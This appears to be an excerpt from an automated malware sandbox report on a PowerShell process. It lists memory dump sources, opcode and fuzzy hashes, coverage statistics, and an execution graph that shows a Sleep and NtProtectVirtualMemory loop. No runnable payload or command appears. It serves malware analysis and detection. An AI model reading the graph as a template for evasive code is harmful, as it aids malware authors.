                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5fbc5a37f0ccfb70aaf6671b6949afecddb93e0ae6a8766c15cd090ca1fdf127
                                  • Instruction ID: a64d27476a4e8070e7bf1ddecb983c350608a5132bd8201c0a45b3505b722114
                                  • Opcode Fuzzy Hash: 5fbc5a37f0ccfb70aaf6671b6949afecddb93e0ae6a8766c15cd090ca1fdf127
                                  • Instruction Fuzzy Hash: 4E816876704365DFD7158B79C8107A7BBA5EFC2250F2880ABD646CB752CA32CC82C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 258d92bc538bc7912763382bb1a2875a2bcdb2821e569733d5cd46af9a5dce56
                                  • Instruction ID: 50062a603337a0ed2b8da5ffc44f381cffc87d2b1613134c6bb70b458df228c0
                                  • Opcode Fuzzy Hash: 258d92bc538bc7912763382bb1a2875a2bcdb2821e569733d5cd46af9a5dce56
                                  • Instruction Fuzzy Hash: 2EA1BFB4B00202DFE714DB68C554F9EBBB2AF88744F108069E506AB791CB72EC51CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85d09e51dccb8f3aff65c31944c59cb378506fe159ec5bce5d31d0bc8cc230de
                                  • Instruction ID: 5d582ba96871d84c53669e73fcca6633c1889a03b40dad7892532e154e807c1a
                                  • Opcode Fuzzy Hash: 85d09e51dccb8f3aff65c31944c59cb378506fe159ec5bce5d31d0bc8cc230de
                                  • Instruction Fuzzy Hash: BF81DF30B00205CFDB15DFA8D890AAEBBB6FFC5210F558169E8059B396DB359C42CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a49c530040d03c15d85524950e6830b0d92c27e2d8f7c22736b64dd507c21cb4
                                  • Instruction ID: 1197579481eba77236fe5edfdce14a5b4dd5eb4c2613a4e8c07e7559248b1acf
                                  • Opcode Fuzzy Hash: a49c530040d03c15d85524950e6830b0d92c27e2d8f7c22736b64dd507c21cb4
                                  • Instruction Fuzzy Hash: A5919F34A02204DFCB15EF68D484AAEBBF2FF89314F1885AAE4459B761CB35ED45CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f88b381816b57048aad8fbd6bd049149ddb66e68f1d9c36fbee4c31dcd31d20
                                  • Instruction ID: 93d52ad9d0d07f5d9863b3d7b362d501e9b16ef7f0f722d8843cb65b62112fea
                                  • Opcode Fuzzy Hash: 6f88b381816b57048aad8fbd6bd049149ddb66e68f1d9c36fbee4c31dcd31d20
                                  • Instruction Fuzzy Hash: BA716230E02608DFDF14EFA4D890AADBBF6BF88304F548569D442AB794DB749C46CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21751faa2db207025c143fa863af6bdc5c99f2c37f1cc827cf809fb2517ee97a
                                  • Instruction ID: 571c74be32f531d7c923d9f9bf74c3096abade536796ab6ec283fc4c42112c62
                                  • Opcode Fuzzy Hash: 21751faa2db207025c143fa863af6bdc5c99f2c37f1cc827cf809fb2517ee97a
                                  • Instruction Fuzzy Hash: 08718030E10249CFDB15DFE4C9546AEBBB2BF85305F25852AD802AF39ADB749C49CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 957d118f328b60cce0b1900d88bdd29dd61e40d7df294ea5c82dbf334f6ddfd7
                                  • Instruction ID: 3f86053dc22f80aefc6896db37b80c98c91b9c8133bfaab8832038fcb2e6a569
                                  • Opcode Fuzzy Hash: 957d118f328b60cce0b1900d88bdd29dd61e40d7df294ea5c82dbf334f6ddfd7
                                  • Instruction Fuzzy Hash: 865127757083859FDB128B34C814BA6BFB1AFC3211F1881ABD5468B293DB35C852C7A3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18b19472bbc5c4d53329d11264b9ea4645951814483c623907da276b11bca210
                                  • Instruction ID: 6ebcfa74ef2ae0248400a1ab3cb348b7270330cede3eb43afad48db7fb93ea32
                                  • Opcode Fuzzy Hash: 18b19472bbc5c4d53329d11264b9ea4645951814483c623907da276b11bca210
                                  • Instruction Fuzzy Hash: F9614D34A01249CFDB05EFA4C544AADBBF2BF84300F659559E442AF365D778AD89CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bed4ed12950bb8e7ce6d7fca18b733be313f59f9b20dd4423b8aa0e763fcfe3d
                                  • Instruction ID: 6e4e1c1ca6a4879a7f17d357fabba3f5a9a58e29fe9184fc054fdc3b04bcd798
                                  • Opcode Fuzzy Hash: bed4ed12950bb8e7ce6d7fca18b733be313f59f9b20dd4423b8aa0e763fcfe3d
                                  • Instruction Fuzzy Hash: 57612F34A01649DFDB04DFA4C544A9DBBF2FF84300F659558E802AF369DB78AD89CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3c9654f3d9113c22659fe631556e7a374a1ffe3fe4c8a4ffe229ae4be1d46a3
                                  • Instruction ID: 4419c22833afbeb5f87a061cc3f23a6c2ed7ba5f4fa967c3abdadd77476abefa
                                  • Opcode Fuzzy Hash: d3c9654f3d9113c22659fe631556e7a374a1ffe3fe4c8a4ffe229ae4be1d46a3
                                  • Instruction Fuzzy Hash: E3518E30A01608DFDB18EF69D880A9EBBF6FF89314F148469D046EB754DB71AC45CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48af2ad50a680ed85899ae88e9b94542a02424deda8a2b2bc0ef0e8d885378f4
                                  • Instruction ID: f168e584186f36106a312a6d15707add8daa91ef2561473b655771e78e80bd69
                                  • Opcode Fuzzy Hash: 48af2ad50a680ed85899ae88e9b94542a02424deda8a2b2bc0ef0e8d885378f4
                                  • Instruction Fuzzy Hash: DA612F34A01649CFDB04DFA4C544AADBBF2FF84300F659558E402AF369DB78AD89CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5bc4bafb04260320dc42aa5546a06690845e2066bf9989c52ffc70f2507cc21
                                  • Instruction ID: 42e11b6a52e2c02b71efda8bbc50451a361329f0c6de4e40d77259e9c184c539
                                  • Opcode Fuzzy Hash: c5bc4bafb04260320dc42aa5546a06690845e2066bf9989c52ffc70f2507cc21
                                  • Instruction Fuzzy Hash: E851DF34B00205CBDB15EBB8D8506AEBBB7FFC4211F55816ED8019B396DB349C46CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cf99ce61786b1cc0523406edd3ccaac60fa71ffc6607a0d327925c349718d11
                                  • Instruction ID: 1e9297e26fd48a77ab13dd55b89a30f3f70dda847dbba6d8500ab7a697492578
                                  • Opcode Fuzzy Hash: 4cf99ce61786b1cc0523406edd3ccaac60fa71ffc6607a0d327925c349718d11
                                  • Instruction Fuzzy Hash: F8517274A05255CFCB06CF6CC9909AEBBB1FF49310B25429AD951EB3A2C735EC45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f7c3b78db2f6a37237f34f91753a5cbb3fa93a869620410cb6353884964101e
                                  • Instruction ID: 53a45c30b7f221cc99788ca9df277dcabbb6ffdc6362aadef3a4c37fce1b0eda
                                  • Opcode Fuzzy Hash: 6f7c3b78db2f6a37237f34f91753a5cbb3fa93a869620410cb6353884964101e
                                  • Instruction Fuzzy Hash: FE51BF71E11248CFDB15DFA8C8046AEBBB2BF85301F21856AD806AF359DB74AC49CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b101aac55b248d200a95ab7b4bf84defbaaa10a82dd5f6e9614adad81fc837c8
                                  • Instruction ID: 0b9a272517e0e152dae07859e8953f196a1947cb6e7ab9370e7c6969435c1ab6
                                  • Opcode Fuzzy Hash: b101aac55b248d200a95ab7b4bf84defbaaa10a82dd5f6e9614adad81fc837c8
                                  • Instruction Fuzzy Hash: 33418FF2B00211CFDB359778882179DBB92AFD1654B3480BAE5028F745DE61C852C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b274e85c10c9fe1300b60b9ba40f0af4dea4366215a2f10f89c34f386b43d14c
                                  • Instruction ID: f3f106584345895e5877fff4a087f3514c1e74b1fb1cb3ec17e774f1a0bd5b61
                                  • Opcode Fuzzy Hash: b274e85c10c9fe1300b60b9ba40f0af4dea4366215a2f10f89c34f386b43d14c
                                  • Instruction Fuzzy Hash: 1D51EB35A00209DFDB05CFA8D484A9EBBB2FF88314F658159E804A7365CB75DD82CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35654a41f63865fca634c58cc9b2014c6c11fb346e35dad011ae2336d934d51e
                                  • Instruction ID: 44b3be7bf1589fefb18fe3351481de077eb70c0db4ad1f417206e6a6baac9723
                                  • Opcode Fuzzy Hash: 35654a41f63865fca634c58cc9b2014c6c11fb346e35dad011ae2336d934d51e
                                  • Instruction Fuzzy Hash: D6412D74A01505DFCB05CF9CC9849AEBBB1FF48310B258259E915AB3A5D335EC42CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fddeb59a3b3221b03ff37e67265d77ce30e8453ccb7366f313ed649d64fdc1c
                                  • Instruction ID: f6d35413b3e1bc7097991dee93fcd6274b4083d62b987bcc70aded6ba6aa999c
                                  • Opcode Fuzzy Hash: 6fddeb59a3b3221b03ff37e67265d77ce30e8453ccb7366f313ed649d64fdc1c
                                  • Instruction Fuzzy Hash: DB419F306022109FDB54EF64C459AAEBBFAEF89754F189468D447EB7A4DB349C01CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afb4105df5cc8166f00a8bd295ed4e9ab4d884b79ff127131eeb4ac99b8bf351
                                  • Instruction ID: 0732f2b4b499b8c59d3e9b5386af03dfe65f3914209f27606eb93a679caee294
                                  • Opcode Fuzzy Hash: afb4105df5cc8166f00a8bd295ed4e9ab4d884b79ff127131eeb4ac99b8bf351
                                  • Instruction Fuzzy Hash: 8641AF30A01708DFDB18EFA8C884A9EBBF6BF84304F54852DD446AB754DB70AC45CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d59b9ce60f78ac614d244d7be4b6a9890e9426a6b4f6ea29fff6e3ca4e0a4fa
                                  • Instruction ID: 67b0ae1f3556aead6cfe726508357a8f30fb3d35c804890a03ded3b864739e3f
                                  • Opcode Fuzzy Hash: 2d59b9ce60f78ac614d244d7be4b6a9890e9426a6b4f6ea29fff6e3ca4e0a4fa
                                  • Instruction Fuzzy Hash: D9415E74A00205DFCB15CF99C9949AEFBB2FF88310B24866AD905AB365D731EC42CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb468edc684efc8944591ded9018188212511235834aba1ebfde202b998cecfd
                                  • Instruction ID: 660b89c7389b5f0c4449943385801608f5fe905928ecc62f671810d22725608d
                                  • Opcode Fuzzy Hash: fb468edc684efc8944591ded9018188212511235834aba1ebfde202b998cecfd
                                  • Instruction Fuzzy Hash: D6316474B40214EBE7049BA4C854FAE76A3DFC5744F548024EA05AF791CFB59C528B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80479f555bd8f8db981a18e4fa22694d5e144d44e870f8e18d8cc3a7b4541cff
                                  • Instruction ID: 7f2f3151a8859f2c691045cb30fd00ee7501cef057595f342f9505121b35466a
                                  • Opcode Fuzzy Hash: 80479f555bd8f8db981a18e4fa22694d5e144d44e870f8e18d8cc3a7b4541cff
                                  • Instruction Fuzzy Hash: 8C318F34E02218DFDB15EBA4C890AEDB7F7AFC8204F548569E441EB791DB30AD46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a0e1ffe6b9d688ee168dcc20167b8f5f6c76593cacde2461ac03cce2e998bcb
                                  • Instruction ID: 5f62d72000db4c32e55cdd78cdcd901b4dfb5691f004970b695688170d9f5111
                                  • Opcode Fuzzy Hash: 1a0e1ffe6b9d688ee168dcc20167b8f5f6c76593cacde2461ac03cce2e998bcb
                                  • Instruction Fuzzy Hash: B0318974A052569FCB04EB5CC5949AAFBF1FF89310B158096D948EB352C731EC82CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bdf70f4c81dfd327adeec5c27c950938963984efbbf86b92de171778248b63c
                                  • Instruction ID: 034e537d14f9206439195b37fbd8dce3d4fac08c2e7ee2fcd01418ca4da0fe77
                                  • Opcode Fuzzy Hash: 2bdf70f4c81dfd327adeec5c27c950938963984efbbf86b92de171778248b63c
                                  • Instruction Fuzzy Hash: 00318E747015059FDB04EF29D498AADBBFABF8C310F184068E506EB7A0DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d98c13166dbb88be7933b8c95bf99a965d24ac1317da8f2d9d2f6b008db29d
                                  • Instruction ID: f9706dc57da243db9627c29411757078b0c9c8df04fd4357c5c1c9739cf9db99
                                  • Opcode Fuzzy Hash: a3d98c13166dbb88be7933b8c95bf99a965d24ac1317da8f2d9d2f6b008db29d
                                  • Instruction Fuzzy Hash: 44311775A002099FCB04DF5CC580AAAFBF6FF88310B258659D518AB755C731ED91CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44bf48748bd09405024223374d419d4f9a8e25dbadeecfbdd8ad4ee3f88b1718
                                  • Instruction ID: 37f553363dfea46b4cb2b3aaa78cbe2a6d48f9e33efa5c63d476c86f1559dafd
                                  • Opcode Fuzzy Hash: 44bf48748bd09405024223374d419d4f9a8e25dbadeecfbdd8ad4ee3f88b1718
                                  • Instruction Fuzzy Hash: A8214A2590E3E09FC7079B7C98B00D5BF709E4721471A50C7C1D4CF1A3D928885DCBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cabb72ed5c516eafb3f38a05fd6a78478e661aedd227fb016e4181c39d94ba7
                                  • Instruction ID: 1305255d386850115aa4a0ee5ed4f720beeb912d55fa3e4b3ada1ac1ed7b07c6
                                  • Opcode Fuzzy Hash: 6cabb72ed5c516eafb3f38a05fd6a78478e661aedd227fb016e4181c39d94ba7
                                  • Instruction Fuzzy Hash: 1F310474A00619DFCB14CF5CC5849AEFBB1FF49310B25869AD959AB752C731EC82CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 152c4f346a721850db0e1828128727a6d8ab6efd9b4b915c04a6be3063f60547
                                  • Instruction ID: 2e4bd86d001e59c67c86ebbd603399ead9278eb0404b968b3aee820badd98618
                                  • Opcode Fuzzy Hash: 152c4f346a721850db0e1828128727a6d8ab6efd9b4b915c04a6be3063f60547
                                  • Instruction Fuzzy Hash: 94310778A00609DFCB14CF98C5849AEFBB1FF48310B2486A9D959AB752C731EC91CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f7e2b81e0e5079ca1a0d2a9662ead27557eef303d97977c2cb3a07a51af0ff3
                                  • Instruction ID: f4903b3438cfe41f70a93ed3d29fb461a3f3c7499d09e82c2f713e7b9e0477a0
                                  • Opcode Fuzzy Hash: 6f7e2b81e0e5079ca1a0d2a9662ead27557eef303d97977c2cb3a07a51af0ff3
                                  • Instruction Fuzzy Hash: E521F335A053458FCB82DB78E8815EE7FB0AF86310B5841DAD145CF322D6749985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 292b07aa10d6deae4e775ff0879074db35c8c1803fb47374a90815c445f45a01
                                  • Instruction ID: 39df02824a4bd2fb8f7f02fbea0f1af0b86f9bdc67097ce648fc49e4e7df95c9
                                  • Opcode Fuzzy Hash: 292b07aa10d6deae4e775ff0879074db35c8c1803fb47374a90815c445f45a01
                                  • Instruction Fuzzy Hash: D521E674A006069FCB04DF89C5949AAFBF5FF89310B2485A9D949EB751C731ED42CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Opcode Fuzzy Hash: 8419b2d7987d1ef15aefd076f9caa481b8b8db5579dbe142f21e615af886cf07
                                  • Instruction Fuzzy Hash: 1DD0C97099520FEFEB14DFC1D6257BF7B74BB60349FB1081AC802B6243EBB446469692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838376879.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_300d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d70945560a80b68c131739e4611ab32a4fe6ccb2acde7b5aaf45d075c52adcb8
                                  • Instruction ID: 03f4867e74b14af9ff20153dbdc3711feb6a3ad4e54726e7d7d74d8ec1c17026
                                  • Opcode Fuzzy Hash: d70945560a80b68c131739e4611ab32a4fe6ccb2acde7b5aaf45d075c52adcb8
                                  • Instruction Fuzzy Hash: 39210672505340DFEB05DF94D9C0B2ABFA5FB88319F2485A9ED090A296C336D456CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:0.9%
                                  Dynamic/Decrypted Code Coverage:55.6%
                                  Signature Coverage:66.7%
                                  Total number of Nodes:9
                                  Total number of Limit Nodes:1
                                  execution_graph (9 nodes, 1 limit node), one edge per line:
                                  • 24882c00 -> 24882c0a
                                  • 24882c0a -> 24882c1f (LdrInitializeThunk)
                                  • 24882c0a -> 24882c11
                                  • 24882b60 (LdrInitializeThunk), no edges
                                  • 75ee7d1 -> 75ee812
                                  • 75ee812 -> 75ee7d1
                                  • 75ee812 -> 75ee837 (Sleep)
                                  • 75ee837 -> 75ee7d1
                                  • 75ee812 -> 75ee841 (NtProtectVirtualMemory)
                                  • 75ee841 -> 75ee812
                                  The nodes 75ee7d1, 75ee812, 75ee837 and 75ee841 form a cycle in which 75ee812 alternates between Sleep and NtProtectVirtualMemory before returning to 75ee7d1.

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph (108 function nodes), edges:
                                  • Function_24882C00 -> Function_24882C0A
                                  • Function_075EE7D1 -> Function_075EE1B4
                                  Nodes:
                                  Function_24819B80, Function_24819584, Function_2481D386, Function_24882B80, Function_24882E80, Function_24885080, Function_2481CF89, Function_24882F90, Function_24883090, Function_2481CC98, Function_2481D69C, Function_24813BA7,
                                  Function_2481B4A7, Function_24882BA0, Function_24882CA0, Function_24882EA0, Function_24882FA0, Function_24813BAC, Function_24813BB1, Function_2481CBB3, Function_2481B4B2, Function_2481ACB5, Function_24882AB0, Function_24882DB0,
                                  Function_24882FB0, Function_248839B0, Function_2481CBB8, Function_24818FBF, Function_2481C9C1, Function_248835C0, Function_24882CC0, Function_24813BCF, Function_24811FD2, Function_24813FD2, Function_24813FD5, Function_2481AAD5,
                                  Function_2481B3D5, Function_24813BD4, Function_24811FD7, Function_24882AD0, Function_24882DD0, Function_24813BD9, Function_24811FDC, Function_2481B1DC, Function_24811FDF, Function_24813BDE, Function_248139E2, Function_2481AAE5,
                                  Function_2481CDE4, Function_24882BE0, Function_24882EE0, Function_24882FE0, Function_24811DEC, Function_2481AAF1, Function_2481D4F2, Function_2481DCF2, Function_2481E2F2, Function_2481AFF7, Function_24882DF0, Function_24882BF0,
                                  Function_24882AF0, Function_24882CF0, Function_248127FA, Function_24813BFA, Function_2481B6FC, Function_24813F00, Function_24882C0A, Function_24882C00, Function_24882D00, Function_2481B008, Function_075EE7D1, Function_2481AF15,
                                  Function_24882D10, Function_24883010, Function_24883D10, Function_24819919, Function_2481CC23, Function_24814522, Function_2481DD2A, Function_2481D82D, Function_24813C31, Function_2481E432, Function_24882D30, Function_24882E30,
